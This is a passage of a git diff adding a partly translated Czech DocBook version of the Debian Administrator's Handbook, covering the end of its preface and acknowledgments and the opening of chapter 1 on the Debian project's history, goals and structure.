+		“Linuxová distribuce” je úplný operační systém; To obvykle zahrnuje linuxové jádro, instalační program, a co je nejdůležitější aplikace a další software potřebný k proměně počítače na skutečně užitečný nástroj.
+	</para>
+	 </sidebar> <para>
+		Debian GNU/Linux je “typická” linuxová distribuce, která se hodí pro většinu uživatelů. Účelem této knihy je ukázat mnoho jejích aspektů, aby jste mohli učinit rozhodnutí založené na co nejvíce informacích.
+	</para>
+	 <section id="sect.why-this-book">
+		<title>Proč tato kniha?</title>
+		 <sidebar> <title><emphasis>KULTURA</emphasis> Komerční distribuce</title>
+		 <indexterm>
+			<primary> distribuce </primary>
+			 <secondary> komerční distribuce </secondary>
+		</indexterm>
+		 <para>
+			Most Linux distributions are backed by a for-profit company that develops them and sells them under some kind of commercial scheme. Examples include <emphasis>Ubuntu</emphasis>, mainly developed by <emphasis>Canonical Ltd.</emphasis>; <emphasis>Red Hat Enterprise Linux</emphasis>, by <emphasis>Red Hat</emphasis>; and <emphasis>SUSE Linux</emphasis>, maintained and made commercially available by <emphasis>Novell</emphasis>.
+		</para>
+		 <para>
+			Na druhém konci spektra leží podoby Debianu a Apache Software Foundation (který zabezpečuje vývoj pro webový server Apache). Debian je především projekt ve světě svobodného softwaru, implementovaný dobrovolníky, kteří spolupracují prostřednictvím internetu. Zatímco někteří z nich pracují na Debianu jako na součásti své placené práce v různých společnostech, projekt jako celek není nijak zvlášť spojen s žádnou společností a ani žádná společnost nemá v projektu větší slovo než co mají dobrovolní přispěvatelé.
+		</para>
+		 </sidebar> <para>
+			Linux has gathered a fair amount of media coverage over the years; it mostly benefits the distributions supported by a real marketing department — in other words, company-backed distributions (Ubuntu, Red Hat, SUSE, and so on). But Debian is far from being a marginal distribution; multiple studies have shown over the years that it is widely used both on servers and on desktops. This is particularly true among webservers where Debian and Ubuntu are the leading Linux distributions. <ulink type="block" url="https://w3techs.com/technologies/details/os-debian/all/all" />
+		</para>
+		 <para>
+			Účelem této knihy je pomoci vám poznat tuto distribuci. Doufáme, že se nám podaří sdílet zkušenosti, které jsme nashromáždili od doby, kdy jsme se připojili k projektu jako vývojáři a přispěvatelé v roce 1998 (Raphaël) a v roce 2000 (Roland). S trochou štěstí bude naše nadšení nakažlivé a možná se k nám někdy připojíte...
+		</para>
+		 <para>
+			První vydání této knihy (v roce 2004) sloužilo k vyplnění mezery: byla to první kniha ve francouzském jazyce, která se zaměřila výhradně na Debian. V té době, mnoho dalších knih bylo napsáno na toto téma jak pro francouzsky mluvící, tak i pro anglicky mluvící čtenáře. Bohužel téměř žádné z nich se nedostávalo aktualizací, a v průběhu let situace sklouzla zpět do pozice, kdy bylo o Debianu jen velmi málo dobrých knih. Doufáme, že tato kniha, která začala svůj nový život překladem do angličtiny (a několika překlady z angličtiny do různých jiných jazyků), zaplní tuto mezeru a pomůže mnoha uživatelům.
+		</para>
+
+	</section>
+	 <section id="sect.who-is-this-book-for">
+		<title>Pro koho je tato kniha?</title>
+		 <para>
+			Snažili jsme se, aby tato kniha byla užitečná pro více kategorií čtenářů. Zaprvé, správci systémů (začátečníci i zkušení) najdou vysvětlení instalace a nasazení Debianu na více počítačích. Budou mít také přehled o většině služeb, které jsou v Debianu k dispozici, spolu s odpovídajícími konfiguračními pokyny a popisem specifik pocházejících z distribuce. Pochopení mechanismů, použitých při vývoji Debianu, jim umožní vypořádat se s nepředvídanými problémy, s tím, že mohou vždy najít pomoc v rámci komunity.
+		</para>
+		 <para>
+			Uživatelé jiné linuxové distribuce nebo jiné varianty Unixu objevoví specifika Debianu a měli by být velmi rychle akceschopní a zároveň plně těžit z jedinečných výhod této distribuce.
+		</para>
+		 <para>
+			A konečně, čtenáři, kteří již mají nějaké znalosti o Debianu a chtějí se dozvědět více o komunitě stojící za ním by měli mít svá očekávání naplněna. Tato kniha by je měla přiblížit k tomu se k nám připojit a stát se přispěvateli.
+		</para>
+
+	</section>
+	 <section id="sect.selected-approach">
+		<title>Obecný přístup</title>
+		 <para>
+			Veškerá obecná dokumentace, kterou o GNU/Linuxu najdete, se vztahuje i na Debian, protože Debian věšinou obsahuje běžný svobodný software. Nicméně, distribuce přináší mnoho vylepšení, což je důvod, proč jsme se rozhodli především popsat “Debianovský způsob” dělání věci.
+		</para>
+		 <para>
+			Je zajímavé sledovat doporučení Debianu ale ještě lepší je pochopit jejich původ. Proto se nebudeme omezovat pouze na praktická vysvětlení; Budeme také popisovat práci projektu, abychom vám poskytli komplexní a konzistentní znalosti.
+		</para>
+
+	</section>
+	 <section id="sect.book-structure">
+		<title>truktura knihy</title>
+		 <para>
+			This book is built around a case study providing both support and illustration for all topics being addressed.
+		</para>
+		 <sidebar> <title><emphasis>POZNÁMKA</emphasis> Webové stránky, emaily autorů</title>
+		 <para>
+			Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <email>hertzog@debian.org</email> (Raphaël) a <email>lolando@debian.org</email> (Roland).<ulink type="block" url="http://debian-handbook.info/" />
+		</para>
+		 </sidebar> <para>
+			<emphasis role="strong">Kapitola 1</emphasis> se zaměřuje na netechnickou prezentaci projektu Debian a popisuje její cíle a organizaci. Tyto aspekty jsou důležité, protože definují obecný rámec, který další kapitoly doplní konkrétnějšími informacemi.
+		</para>
+		 <para>
+			<emphasis role="strong">Kapitoly 2 a 3</emphasis> poskytují široký nástin případové studie. V tomto bodě by si mohli začínající čtenáři najít čas na čtení <emphasis role="strong">dodatku B</emphasis>, kde najdetou krátký doučovací kurz vysvětlující řadu základních počítačových pojmů, stejně jako koncepty vlastní jakémukoliv Unixovému systému.
+		</para>
+		 <para>
+			Abychom se dostali k podstatě předmětu, zcela přirozeně začneme procesem instalace (<emphasis role="strong">Kapitola 4</emphasis>); <emphasis role="strong">kapitoly 5 a 6</emphasis> představí základní nástroje, které bude používat každý správce Debianu, jako jsou ty z rodiny <emphasis role="strong">APT</emphasis> , která je z velké části zodpovědná za vynikající reputaci distribuce. Tyto kapitoly nejsou nijak omezeny na profesionály, protože doma je každý svým vlastním administrátorem.
+		</para>
+		 <para>
+			<emphasis role="strong">Kapitola 7</emphasis> bude důležitá vsuvka; Popisuje pracovní postupy k efektivnímu používání dokumentace a rychlému pochopení problémů, za účelem jejich vyřešení.
+		</para>
+		 <para>
+			Následující kapitoly budou podrobnější prohlídkou systému, počínaje základní infrastrukturou a službami (<emphasis role="strong">kapitoly 8 až 10</emphasis>) a postupně se zásobníkem se dostaneme až k uživatelským aplikacím v <emphasis role="strong">kapitole 13</emphasis>. <emphasis role="strong">Kapitola 12</emphasis> se zabývá pokročilejšími předměty, které se nejvíce přímo týkají správců velkých souborů počítačů (včetně serverů), zatímco <emphasis role="strong">Kapitola 14</emphasis> je stručný úvod do širšího předmětu počítačové bezpečnosti a dává několik návodů, jak se vyhnout většině problémů.
+		</para>
+		 <para>
+			<emphasis role="strong">Kapitola 15</emphasis> je pro administrátory, kteří chtějí jít dál a vytvořit si vlastní debianovské balíčky.
+		</para>
+		 <sidebar> <title><emphasis>Slovní zásoba</emphasis> Balíček Debianu</title>
+		 <indexterm>
+			<primary>balíček</primary>
+			 <secondary>Balíček Debianu</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>balíček</primary>
+			 <secondary>binární balíček</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>balíček</primary>
+			 <secondary>zdrojový balíček</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>zdroj</primary>
+			 <secondary>balíček</secondary>
+		</indexterm>
+		 <para>
+			Balíček Debianu je archiv obsahující všechny soubory potřebné k instalaci softwaru. Obvykle se jedná o soubor s příponou <filename>deb</filename> , který lze zpracovat příkazem <command>dpkg</command>. Také nazývaný <emphasis>binární balíček</emphasis>obsahuje soubory, které lze přímo použít (například programy nebo dokumentace). Na druhou stranu <emphasis>zdrojový balíček</emphasis> obsahuje zdrojový kód pro software a pokyny potřebné pro sestavení binárního balíčku.
+		</para>
+		 </sidebar> <para>
+			The present version is already the eighth edition of the book (we include the first four that were only available in French). This edition covers version 9 of Debian, code-named <emphasis role="distribution">Stretch</emphasis>. Among the changes, Debian now sports a new architecture — <emphasis>mips64el</emphasis> for little-endian 64-bit MIPS processors. On the opposite side, the <emphasis>powerpc</emphasis> architecture has been dropped due to lack of volunteers to keep up with development (which itself can be explained by the fact that associated hardware is getting old and less interesting to work on). All included packages have obviously been updated, including the GNOME desktop, which is now in its version 3.22. Most executables have been rebuilt with PIE build flags thus enabling supplementary hardening measures (Address Space Layout Randomization, ASLR).
+		</para>
+		 <para>
+			Přidali jsme nějaké poznámky a boční komentáře. Mají různé role: mohou upozornit na obtížný bod, dokončit myšlenku případové studie, definovat některé termíny, nebo sloužit jako připomenutí. Zde je seznam nejběžnějších bočních poznámek:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					ZPĚT k ZÁKLADŮM: připomínka některých informací, které mají být známy;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					SLOVNÍ ZÁSOBA: definuje technický termín, někdy specifický pro Debian;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					KOMUNITA: poukazuje na důležité osoby nebo role v rámci projektu;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					ZÁSADY: pravidlo nebo doporučení ze zásad Debianu. Tento dokument je nezbytný v rámci projektu a popisuje, jak balíčkovat software. Části zásad zvýrazněné v této příručce přináší uživatelům přímé výhody (například s vědomím, že zásady standardizují umístění dokumentace a příklady usnadňují najít je i v novém balíčku).
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					Nástroj: představuje příslušný nástroj nebo službu;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					V praxi: teorie nemusí vždy odpovídat praxi; tyto boční poznámky obsahují rady vyplývající z našich zkušeností. Mohou také poskytnout podrobné a konkrétní příklady;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					ostatní více či méně časté boční komentáře jsou do jisté míry zřejmé: KULTURA, TIP, UPOZORNĚNÍ, JDĚTE DÁL, BEZPEČNOST, a tak dále.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+
+	</section>
+	 <section id="sect.acknowledgments">
+		<title>Poděkování</title>
+		 <section>
+			<title>Trocha historie</title>
+			 <para>
+				V roce 2003, kontaktoval Nat Makarévitch Raphaëla, protože chtěl zveřejnit knihu o Debianu v kolekci <foreignphrase>Cahier de l'Admin</foreignphrase> (Příruček pro správce), kterou měl na starosti pro Eyrolles, předního francouzského vydavatele technických knih. Raphaël okamžitě souhlasil, že ji napíše. První vydání vyšlo 14.října 2004 a mělo obrovský úspěch - bylo vyprodáno sotva o čtyři měsíce později.
+			</para>
+			 <para>
+				Since then, we have released 7 other editions of the French book, one for each subsequent Debian release. Roland, who started working on the book as a proofreader, gradually became its co-author.
+			</para>
+			 <para>
+				I když jsme byli samozřejmě spokojeni s úspěchem knihy, vždy jsme doufali, že Eyrolles přesvědčí nějakého mezinárodního vydavatele, aby ji přeložil do angličtiny. Obdrželi jsme četné komentáře vysvětlující, jak kniha pomohla lidem s Debianem začít a byli jsme dychtiví, aby i ostatní měli z knihy stejný prospěch.
+			</para>
+			 <para>
+				Alas, no English-speaking editor that we contacted was willing to take the risk of translating and publishing the book. Not put off by this small setback, we negotiated with our French editor Eyrolles and got back the necessary rights to translate the book into English and publish it ourselves. Thanks to a <ulink url="http://www.ulule.com/debian-handbook/">successful crowdfunding campaign</ulink>, we worked on the translation between December 2011 and May 2012. The “Debian Administrator's Handbook” was born and it was published under a free-software license!
+			</para>
+			 <para>
+				While this was an important milestone, we already knew that the story would not be over for us until we could contribute the French book as an official translation of the English book. This was not possible at that time because the French book was still distributed commercially under a non-free license by Eyrolles.
+			</para>
+			 <para>
+				In 2013, the release of Debian 7 gave us a good opportunity to discuss a new contract with Eyrolles. We convinced them that a license more in line with the Debian values would contribute to the book's success. That wasn't an easy deal to make, and we agreed to setup another <ulink url="http://www.ulule.com/liberation-cahier-admin-debian/">crowdfunding campaign</ulink> to cover some of the costs and reduce the risks involved. The operation was again a huge success and in July 2013, we added a French translation to the Debian Administrator's Handbook.
+			</para>
+			 <para>
+				Rádi bychom poděkovali všem, kteří se připojili k těmto kampaním veřejného financování, buďto tím, že poskytli nějaké peníze, nebo tím, že se zmínili ve svém okolí. Bez vás bychom to nezvládli.
+			</para>
+			 <para>
+				To save some paper, 5 years after the fundraising campaigns and after two subsequent editions, we dropped the list of persons who opted to be rewarded with a mention of their name in the book. But their names are engraved in the acknowledgments of the Wheezy edition of the book: <ulink type="block" url="https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html" />
+			</para>
+
+		</section>
+		 <section>
+			<title>Zvláštní poděkování přispěvatelům</title>
+			 <para>
+				Tato kniha by nebyla tím, čím je, bez přispění několika osob, které hrály důležitou roli během překladatelské fáze i mimo ni. Rádi bychom poděkovali Marilyne Brun, která nám pomohla přeložit vzorovou kapitolu a která s námi pracovala na definování některých společných překladatelských pravidel. Revidovala také několik kapitol, které zoufale potřebovaly dopracovat. Děkuji Anthony Baldwinovi (z Baldwin Linguas), který pro nás překládal několik kapitol.
+			</para>
+			 <para>
+				Těžíme z velkorysé pomoci korektorů: Daniel Phillips, Gerold Rupprecht, Gordon ony, Jákob Owens, a tom Syroid. Každý z nich zrevidoval mnoho kapitol. Mockrát děkuji!
+			</para>
+			 <para>
+				Poté, co anglická verze byla uvolněna, jsme samozřejmě dostali spoustu ohlasů, návrhů na opravy od čtenářů, a ještě více od mnoha týmů, které se zavázali přeložit tuto knihu do ostatních jazyků. Díky!
+			</para>
+			 <para>
+				Chtěli bychom také poděkovat čtenářům francouzské knihy, kteří nám poskytli ohlasy, co potvrzovaly, že kniha opravdu stála za to ji přeložit, děkuji: Christian Perrier, David Bercot, Étienne Liétart, a Gilles Roussi. Stefano Zacchiroli - který byl vedoucím projektu Debian během kampaně veřejného financování - si také zaslouží velké poděkování, on laskavě schválil projekt s vysvětlujícím sdělením, že svobodné (as in freedom) knihy bylo více než třeba.
+			</para>
+			 <para>
+				Máte-li to potěšení číst tyto řádky v brožované kopii knihy, pak byste se měli připojit k nám a poděkovat Benoît Guillonovi, Jean-Côme Charpentierovi, a Sébastienu Menginovi, kteří pracovali na vnitřním designu knihy. Benoît je upstream autor <ulink url="http://dblatex.sourceforge.net"> dblatexu </ulink> — nástroje, který jsme použili pro převedení DocBooku na LaTeX (a pak PDF). Sébastien je designér, který vytvořil tento pěkný knižní layout a Jean-Côme je odborník na LaTeX, který jej implementoval jako StyleSheet použitelný s dblatexem. Děkuji vám kluci za všechnu tvrdou práci!
+			</para>
+			 <para>
+				A konečně, děkuji Thierry Stempfelovi za pěkné obrázky uvádějící každou kapitolu, a děkuji Doru Patrascoci za krásný obal této knihy.
+			</para>
+
+		</section>
+		 <section>
+			<title>Díky překladatelům</title>
+			 <para>
+				Ever since the book has been freed, many volunteers have been busy translating it to numerous languages, such as Arabic, Brazilian Portuguese, German, Italian, Spanish, Japanese, Norwegian Bokmål, etc. Discover the full list of translations on the book's website: <ulink url="http://debian-handbook.info/get/#other" />
+			</para>
+			 <para>
+				Rádi bychom poděkovali všem překladatelům a recenzentům překladů. Vaše práce je vysoce ceněna, protože přináší Debian do rukou miliónů lidí, kteří neumí číst anglicky.
+			</para>
+
+		</section>
+		 <section>
+			<title>Osobní poděkování od Raphaëla</title>
+			 <para>
+				Za prvé, rád bych poděkoval Natovi Makarévitchovi, který mi nabídl možnost napsat tuto knihu a který mi poskytl pevné vedení, během roku, který byl potřeba k jejímu dokončení. Děkuji také bezva týmu v Eyrolles, a Muriele Shan SEI Fanové zejména. Byla se mnou velmi trpělivá a hodně jsem se s ní naučil.
+			</para>
+			 <para>
+				Období kampaní na Ulule bylo pro mě velmi náročné, ale chtěl bych poděkovat všem, kteří pomáhali, aby byly úspěšné, a zejména týmu Ulule, který reagoval velmi rychle na mnoho mých požadavků. Děkuji také všem, kteří propagovali tyto akce. Nemám žádný vyčerpávající seznam (a kdybych měl, byl by pravděpodobně příliš dlouhý), ale rád bych poděkoval několika lidem, kteří se mnou byli v kontaktu: Joey-Elijah Sneddon a Benjamin Humphrey z OMG! Ubuntu, Florent Zara z LinuxFr.org, Manu z Korben.info, Frédéric Couchet z April.org, Jake Edge z Linux Weekly News, Clement Lefebvre z Linux Mint, Ladislav Bodnar z DistroWatch, Steve kemp z Debian-Administration.org, Christian Pfeiffer Jensen z Debian-News.net, Artem Nosulchik z LinuxScrew.com, Stephan Ramoin z Gandi.net, Matthew Bloch z Bytemark.co.uk, tým na Divergence FM, Rikki Kite z Linux New Media, Jono Bacon, marketingový tým Eyrolles, a mnoho dalších, na které jsem zapomněl (omlouvám se za to).
+			</para>
+			 <para>
+				Chtěl bych se zaměřit na zvláštní poděkování Rolandu Masovi, mému spoluautorovi. Spolupracujeme na této knize od začátku a on byl vždy připraven na tuto výzvu. A musím říci, že dokončení Administrátorské příručky bylo hodně práce...
+			</para>
+			 <para>
+				V neposlední řadě děkuji své manželce Sophii. Ona mě velmi podporuje v mé práci na této knize a na Debianu všeobecně. Bylo příliš mnoho dní (a nocí), kdy jsem ji nechal samotnou s našimi dvěma syny, abych v práci na knize udělal nějaký pokrok. Jsem vděčný za její podporu a vím, jaké mám štěstí, že ji mám.
+			</para>
+
+		</section>
+		 <section>
+			<title>Osobní poděkování od Rolanda</title>
+			 <para>
+				Takže Raphaël mě už předešel ve většině poděkování. Stejně ještě zdůrazím své osobní poděkování dobrým lidem v Eyrolles, s nimiž spolupráce byla vždy příjemná a snadná. Doufejme, že výsledky jejich vynikajícího sdělení nebyly ztraceny v překladu.
+			</para>
+			 <para>
+				Jsem nesmírně vděčný Raphaëlovi za převzetí administrativní části tohoto anglického vydání. Od organizování kampaně na financování po poslední detaily rozvržení knihy, vydávat přeloženou knihu je mnohem víc než jen překládání a korektury, a Raphaël udělal (nebo delegoval a kontroloval) to všechno. Takže díky.
+			</para>
+			 <para>
+				Děkujeme také všem, kteří více či méně přímo přispěli k této knize, tím, že poskytnuli objasnění nebo vysvětlení, nebo překladatelské rady. Je jich příliš mnoho na to je zmínit, ale většinu z nich lze obvykle nalézt na různých #debian-* IRC kanálech.
+			</para>
+			 <para>
+				Je tu samozřejmě určité překrytí s předchozí skupinou lidí, ale zvláštní poděkování je jistě v pořádku lidem, kteří nyní dělají Debian. Bez nich by z knihy moc nebylo, a já jsem stále ohromen tím, co projekt Debian jako celek produkuje a zpřístupňuje každému a všem.
+			</para>
+			 <para>
+				Další osobní poděkování patří mým přátelům a mým klientům, za jejich porozumění, když jsem byl méně vstřícný, protože jsem pracoval na této knize, a také pro jejich neustálou podporu, povzbuzení a hecování. Oni vědí o kom mluvím. Díky.
+			</para>
+			 <para>
+				And finally; I am sure they would be surprised by being mentioned here, but I would like to extend my gratitude to Terry Pratchett, Jasper Fforde, Tom Holt, William Gibson, Neal Stephenson, and of course the late Douglas Adams. The countless hours I spent enjoying their books are directly responsible for my being able to take part in translating one first and writing new parts later.
+			</para>
+
+		</section>
+
+	</section>
+</preface>
+
diff --git a/tmp/cs-CZ/xml/01_the-debian-project.xml b/tmp/cs-CZ/xml/01_the-debian-project.xml
new file mode 100644
index 000000000..68251b594
--- /dev/null
+++ b/tmp/cs-CZ/xml/01_the-debian-project.xml
@@ -0,0 +1,1517 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="the-debian-project" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Cíl</keyword>
+			 <keyword>Prostředky</keyword>
+			 <keyword>Operace</keyword>
+			 <keyword>Dobrovolník</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Projekt Debian</title>
+	 <highlights> <para>
+		Než se ponoříme přímo do technologie, pojďme se podívat na to, co to je projekt Debian, jeho cíle, jeho prostředky a jeho provoz.
+	</para>
+	 </highlights> <section id="sect.what-is-debian">
+		<title>Co je Debian?</title>
+		 <indexterm>
+			<primary>sdružení</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>CULTURE</emphasis> Origin of the Debian name</title>
+		 <para>
+			Nehledejte dále: Debian není zkratka. Tento název je ve skutečnosti spojení dvou křestních jmen: a to Iana Murdocka, a v té době jeho přítelkyně, Debry. Debra + Ian = Debian.
+		</para>
+		 </sidebar> <para>
+			Debian je distribuce GNU/Linuxu. O tom, co to je distribuce budeme diskutovat podrobněji v části <xref linkend="sect.role-of-distributions" />, ale nyní budeme jednoduše konstatovat, že se jedná o kompletní operační systém, včetně softwaru a systémů pro instalaci a řízení, vše na základě Linuxového jádra a svobodného softwaru (zejména z projektu GNU).
+		</para>
+		 <para>
+			Když v roce 1993, pod vedením FSF, vytvořil Debian, měl Ian Murdock jasné cíle, které vyjádřil v <emphasis>Manifestu Debianu</emphasis>. Svobodný operační systém, o který usiloval, musel mít dva hlavní rysy. Za prvé, kvalitu: Debian musí být vyvinut s největší péčí, aby byl hoden linuxového jádra. Musí být rovněž nekomerční distribucí, která dostatečně věrohodně konkuruje velkým komerčním distribucím. Této dvojí ambice by bylo v jeho očích možné dosáhnout pouze otevřením procesu vývoje Debianu, stejně jako v případě Linuxu a projektu GNU. Vzájemná kontrola by tedy neustále tento produkt zlepšovala.
+		</para>
+		 <sidebar> <title><emphasis>KULTURA</emphasis> GNU, projekt od FSF</title>
+		 <indexterm>
+			<primary>GNU</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>GNU</primary>
+			<secondary>Není UNIX</secondary>
+		</indexterm>
+		 <para>
+			Projekt GNU je řada svobodného softwaru vyvíjeného nebo sponzorovaného nadací Free Software Foundation (FSF), založené svým kultovním vůdcem, Dr. Richardem M. Stallmanem. GNU je rekurzivní zkratka znamenající “GNU Není Unix”.
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>KULTURA</emphasis> Richard Stallman</title>
+		 <indexterm>
+			<primary>Stallman, Richard</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>RMS</primary>
+		</indexterm>
+		 <para>
+			<acronym>FSF</acronym>'s founder and author of the GPL license, Richard M. Stallman (often referred to by his initials, RMS) is a charismatic leader of the Free Software movement. Due to his uncompromising positions, he is not unanimously admired, but his non-technical contributions to Free Software (in particular at the legal and philosophical level) are respected by everybody.
+		</para>
+		 </sidebar> <section>
+			<title>Multiplatformní operační systém</title>
+			 <indexterm>
+				<primary>meta-distribuce</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>Společenství</emphasis> cesta Iana Murdocka</title>
+			 <indexterm>
+				<primary>Ian Murdock</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Murdock, Ian</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Progeny</primary>
+			</indexterm>
+			 <para>
+				Ian Murdock, zakladatel projektu Debian, byl jeho první vůdce od roku 1993 do roku 1996. Po předání štafety Bruceu Perensovi zhostil se Ian méně veřejné role. Vrátil se do práce v zákulisí společenství Svobodného softwaru vytvořením firmy Progeny, se záměrem prodávat distribuci odvozenou z Debianu. Tento podnik se stal, bohužel, obchodním nezdarem a vývoj byl ukončen. Společnost, po několika letech přežívání, pouze jako poskytovatel služeb, nakonec v dubnu 2007 vyhlásil bankrot. Z různých projektů započaté Progeny, pouze <emphasis>discover </emphasis> stále zůstává. Jedná se o automatický nástroj pro detekci hardwaru.
+			</para>
+			 <para>
+				Ian Murdock died on 28 December 2015 in San Francisco after a series of worrying tweets where he reported having been assaulted by police. In July 2016 it was announced that his death had been ruled a suicide.
+			</para>
+			 </sidebar> <para>
+				Debian, remaining true to its initial principles, has had so much success that, today, it has reached a tremendous size. The 12 architectures offered cover 10 hardware architectures and 2 kernels (Linux and FreeBSD, although the FreeBSD-based ports are not part of the set of officially supported architectures). Furthermore, with more than 25,000 source packages, the available software can meet almost any need that one could have, whether at home or in the enterprise.
+			</para>
+			 <para>
+				The sheer size of the distribution can be inconvenient: it is really unreasonable to distribute 14 DVD-ROMs to install a complete version on a standard PC… This is why Debian is increasingly considered as a “meta-distribution”, from which one extracts more specific distributions intended for a particular public: Debian-Desktop for traditional office use, Debian-Edu for education and pedagogical use in an academic environment, Debian-Med for medical applications, Debian-Junior for young children, etc. A more complete list of the subprojects can be found in the section dedicated to that purpose, see <xref linkend="sect.sub-projects" />.
+			</para>
+			 <para>
+				Tyto dílčí pohledy na Debian jsou organizovány v dobře definovaném rámci, což zaručuje bezproblémovou kompatibilitu mezi různými “sub-distribucemi”. Každá z nich se řídí obecným plánem pro vydávání nových verzí. A protože staví na stejných základech, mohou být snadno rozšířeny, dokončeny a personalizovány s aplikacemi dostupnými v repozitářích Debianu.
+			</para>
+			 <indexterm>
+				<primary>dílčí projekt</primary>
+			</indexterm>
+			 <para>
+				Všechny nástroje Debianu fungují v tomto sledu: <command>debian-cd</command> má již dlouhou dobu povoleno vytvoření sady CD-ROM obsahujících pouze předem vybraný soubor balíků; <command>debian-installer</command> je také modulární instalátor, který se snadno přizpůsobí zvláštním potřebám. <command>APT</command> bude instalovat balíky z různých zdrojů a zároveň garantovat celkovou konzistenci systému.
+			</para>
+			 <sidebar> <title><emphasis>NÁSTROJ</emphasis> Vytvoření CD-ROM Debianu</title>
+			 <indexterm>
+				<primary><command>debian-cd</command></primary>
+			</indexterm>
+			 <para>
+				<command>debian-cd</command> vytváří ISO obrazy instalačních médií (CD, DVD, Blu-ray, atd.) připravené k použití. Jakékoliv záležitosti týkající se tohoto softwaru jsou diskutovány (v angličtině) na <email>debian-cd@lists.debian.org</email> mailing listu. Tým je pod vedením Steva McIntyra, který řídí oficiální ISO stavební části Debianu.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Do každého počítače, jeho architektura</title>
+			 <para>
+				Termín “architektura” označuje typ počítače (mezi nejvíce známé patří Mac nebo PC). U každé architektury dělá odlišnost především její procesor, obvykle nekompatibilní s ostatními procesory. Tyto rozdíly v hardwaru obnášejí různé provozní prostředky, což vyžaduje, aby byl software kompilován specificky pro každou architekturu.
+			</para>
+			 <indexterm>
+				<primary>architektura</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>procesor</primary>
+			</indexterm>
+			 <para>
+				Většina softwaru dostupného v Debianu je napsána v přenosných programovacích jazycích: stejný zdrojový kód může být sestaven pro různé architektury. Ve skutečnosti, spustitelný binární soubor, který je kompilován pro specifickou architekturu, nebude obvykle fungovat na ostatních architekturách.
+			</para>
+			 <para>
+				Připomeňme si, že každý program je vytvořen napsáním zdrojového kódu; tento zdrojový kód je textový soubor složený z instrukcí v daném programovacím jazyce. Než budete moci software používat, je nutné zkompilovat zdrojový kód, což znamená transformovat kód do binárního souboru (série instrukcí stroje spustitelného procesorem). Každý programovací jazyk má konkrétní kompilátor pro provedení této operace (například <command>gcc</command> pro programovací jazyk C).
+			</para>
+			 <indexterm>
+				<primary>zdroj</primary>
+				 <secondary>kód</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>binární kód</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>kompilace</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>kompilátor</primary>
+			</indexterm>
+			 </sidebar> <sidebar> <title><emphasis>NÁSTROJ</emphasis> Instalátor</title>
+			 <indexterm>
+				<primary><command>debian-installer</command> </primary>
+			</indexterm>
+			 <para>
+				<command>debian-installer</command> je název instalačního programu Debianu. Jeho modulární konstrukce umožňuje použití v širokém rozsahu instalačních scénářů. Vývojové práce jsou koordinovány na <email>debian-boot@lists.debian.org</email> mailing listu pod vedením Cyrila Bruleboise.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Kvalita svobodného softwaru</title>
+			 <para>
+				Debian dodržuje všechny principy svobodného softwaru a jeho nové verze nejsou uvolněny, dokud nejsou připraveny. Vývojáři nejsou nuceni stanoveným plánem spěchat kvůli splnění nějakého termínu. Lidé si často stěžují na dlouhou dobu mezi stabilními verzemi Debianu, ale tato opatrnost také zajišťuje legendární spolehlivost Debianu: dlouhé měsíce testování jsou skutečně nezbytné pro úplnou distribuci k získání štítku “stabilní”.
+			</para>
+			 <para>
+				Debian nebude dělat kompromisy ve kvalitě: všechny známé kritické chyby jsou vyřešeny v jakékoli nové verzi, i když to vyžaduje odsunutí původně předpokládaného datum vydání.
+			</para>
+
+		</section>
+		 <section>
+			<title>Právní rámec: nezisková organizace</title>
+			 <para>
+				Po právní stránce, Debian je projekt řízený Americkou neziskovou, dobrovolnickou asociací. Projekt má kolem tisíce <emphasis>vývojářů Debianu</emphasis>, ale sdružuje mnohem větší počet přispěvatelů (překladatelů, těch, co hlásí chyby, umělců, příležitostných vývojářů, atd.).
+			</para>
+			 <para>
+				Aby se porjekt mohl uskutečnit, má Debian širokou infrastrukturu, s mnoha servery připojenými přes internet, poskytnutými velkým počtem sponzorů.
+			</para>
+			 <sidebar> <title><emphasis>KOMUNITA</emphasis> Za Debianem, asociace SPI, a místní pobočky</title>
+			 <indexterm>
+				<primary>sdružení</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>SPI</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Debian Francie</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Software ve veřejném zájmu</primary>
+			</indexterm>
+			 <para>
